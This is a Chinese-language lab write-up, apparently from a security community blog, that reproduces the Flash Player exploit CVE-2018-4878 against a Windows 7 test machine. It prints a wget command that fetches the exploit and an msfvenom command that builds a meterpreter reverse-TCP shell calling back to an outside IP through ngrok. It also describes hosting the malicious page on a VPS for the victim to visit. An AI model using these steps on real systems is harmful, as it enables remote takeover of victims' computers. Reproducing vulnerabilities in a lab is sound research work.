CVE-2018-4878的复现

2018-06-29 1,850

前言:

CVE-2018-4878利用flash的漏洞来进行攻击,如果受害者的flash版本在28.0.0.137及其之前,那么攻击者可以通过诱使受害者点击链接访问特定网页来控制受害者的电脑。

1 漏洞影响范围

Flash Player28.0.0.137及以前的所有版本

2 漏洞复现

2.1 测试环境

攻击机:kali2017

靶机:win7_x64+IE8+FLASH_player28.0.0.137


2.2 复现过程

1.在github上面下载cve-2018-4878的exp并解压

wget https://raw.githubusercontent.com/backlion/demo/master/CVE-2018-4878.rar

图片1.png

图片2.png

2.ngrok配置内网穿透

图片3.png

这里的作用是将tcp://0.tcp.ngrok.io:10270的流量转发到本地的1234端口

我们再ping一下得到ip

图片4.png

3.用msfvenom生成shellcode

msfvenom -p windows/meterpreter/reverse_tcp lhost=52.14.61.47 lport=10270 -f python>/var/shellcode.txt

图片5.png

4.修改exp

复制我们生成的shellcode

图片6.png

vim打开我们的cve-2018-4878.py,然后用我们刚才生成的shellcode替换开头的shellcode

图片7.png

然后将stageless的值改为false

图片8.png

修改文件路径为我们的解压路径

图片9.png

然后将解压路径下的exp测试弹出文件夹下的index.htmlexploit.swf复制到解压路径

然后运行python cve-2018-4878.py

图片10.png

5.msf配置监听

运行msfconsole

图片11.png

然后设置paylaod,监听地址,监听端口

图片12.png

等待肉鸡上线


6.复制文件到vps上面,用靶机访问,完成复现

我们可以通过winscp将我们生成的exploit.swfindex.html复制到vps的html目录下

然后用靶机访问页面

图片13.png

然后会返回一个session

图片14.png

然后可以通过sessions -i命令进入meterpreter

图片15.png

复现成功


Tags:
评论  (0)
快来写下你的想法吧!

Drac0nids

文章数:4 积分: 65

安全问答社区

安全问答社区

脉搏官方公众号

脉搏公众号